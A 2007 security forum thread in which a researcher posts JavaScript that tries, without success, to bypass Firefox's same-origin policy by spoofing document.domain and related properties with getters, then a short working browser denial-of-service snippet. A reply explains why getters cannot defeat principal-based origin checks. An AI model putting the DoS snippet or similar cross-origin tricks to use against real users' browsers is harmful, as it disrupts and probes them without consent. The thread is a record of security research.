Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Hacking Firefox
Posted by: Gareth Heyes
Date: November 12, 2007 09:03AM

Well I've been bored over the last few days and I thought I'd have a bash at Firefox same origin policy. So far I think I've nearly cracked it, I just can't find out a way to spoof the location object. Anyone any ideas?

Check out the following code in Firebug:-
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<title>Firefox hacking</title>
<script type="text/javascript">
window.onload = function() {
	newElement = document.createElement('iframe');
	newElement.src = 'http://www.google.co.uk/';
	newElement.id = 'sourceCode';
	document.__defineGetter__("domain", function() { return 'www.google.co.uk'});	
	document.__defineGetter__("URL", function() { return 'http://www.google.co.uk/'});
	document.__defineGetter__("baseURI", function() { return 'http://www.google.co.uk/'});
	document.documentElement.__defineGetter__("baseURI", function() { return 'http://www.google.co.uk/'});
	newElement.__defineGetter__("baseURI", function() { return 'http://www.google.co.uk/'});
	document.body.appendChild(newElement);	
	//newElement.__defineGetter__("nodeName", function() { return 'body'});
	//newElement.__defineGetter__("localName", function() { return 'body'});			
	setTimeout('getContent()',5000);
}
function getContent() {		
	document.__defineGetter__("strictErrorChecking", function() { return false});
	document.__defineGetter__("documentURI", function() { return 'http://www.google.co.uk/'});
	/*req = createAjaxRequest();
	req.onreadystatechange = reqChange; 
	try {
		req.open("GET",'http://www.google.co.uk/',true);
	} catch(err) {
		alert(err);
	}	
	req.send(null);	
	*/
	alert(newElement.contentWindow.document.body)
	var str = '';
	var textContent = document.getElementById('textContent');
	for(i in newElement) {
		str += i + '=' + newElement + '<br>';
	}
	textContent.innerHTML = str;
}
function grabInfo() {
	alert(1);
}
function reqChange() {
	alert(2);
	if(req.readyState == 4) {
		if(req.status == 200) {
			grabInfo();
		} else {
			alert("There was a problem retrieving the XML data:\n" +req.statusText);
		}
	}
} 
function createAjaxRequest() {
	try { return new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) {}
	try { return new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {}
	try { return new XMLHttpRequest(); } catch(e) {}
		alert("XMLHttpRequest not supported");
	return null;
} 
window.onerror = function() {
	//alert(newElement.contentWindow.document.body);
	//return true;
}
</script>
</head>

<body>
<div id="textContent"></div>
</body>
</html>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 11/12/2007 09:06AM by Gareth Heyes.

Options: ReplyQuote
Re: Hacking Firefox
Posted by: Gareth Heyes
Date: November 12, 2007 09:31AM

// doesn't work :(
document.location getter = new Function(); 
// doesn't work :(
document.__defineGetter__("location", function() { return 'http://www.google.co.uk/'});
// doesn't work :(
document.location = function() { return null; }

Seems close, I keep getting security 1000 errors. Maybe it's not possible to exploit just domain spoofing etc.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Hacking Firefox
Posted by: kirke
Date: November 13, 2007 02:13AM

did you check http://developer.mozilla.org/en/docs/index.php?title=Core_JavaScript_1.5_Guide:Creating_New_Objects:Defining_Getters_and_Setters#Summary

Options: ReplyQuote
Re: Hacking Firefox
Posted by: Gareth Heyes
Date: November 13, 2007 03:27AM

Hi kirke

Yeah but the problem is whenever you try and overwrite the location object it assumes it is a new location. I can spoof all other properties and I was thinking that the location object was the only one left and maybe it would be possible to fooling Firefox to bypass same origin policy. It might have some other security check but I find it fun trying :)

Take the following example from the code above:
document.__defineGetter__("domain", function() { return 'www.google.co.uk'});
alert('document.domain:'+document.domain);

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Hacking Firefox
Posted by: Gareth Heyes
Date: November 14, 2007 02:12PM

I've released a cool DOS based on this code on my blog :)

window.onload = function() {	
 
	history.__defineGetter__("x", function() { 
	 for(i in this) {
	  try {
	   alert(this);
	  } catch(e) {
	 }
        }
       });
 
	history.x;
}

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Hacking Firefox
Posted by: trev
Date: February 18, 2008 03:45AM

I am pretty late to the party but still - this cannot work. You can only modify the JavaScript wrappers of internal objects, the browser will access the objects directly however. Also, Firefox uses neither window.location nor document.domain for same-origin policy - policy enforcement in Firefox is always based on a principal object. The document is associated with a principal when it is created, and its scripts inherit this principal when they are compiled. After that the principal doesn't change any more and it isn't accessible from JavaScript either (not even indirectly from what I can tell).

Now that doesn't mean that the whole thing is fool-proof, the handling of principals in Firefox is everything but straightforward and it might be possible to create a situation where same-origin policy fails. But you certainly cannot get there by defining getters.

Interestingly however, you could fool Yahoo Application State Plugin with getters (not sure whether this still works). This plugin is installed automatically by Yahoo Messenger and is supposed to tell only Yahoo pages whether Messenger is installed and which version it is. The restriction to Yahoo pages worked via checking document.domain - and could be easily tricked with getters. Why Yahoo decided to call into JavaScript from a binary browser plugin is beyond me...

Options: ReplyQuote


Sorry, only registered users may post in this forum.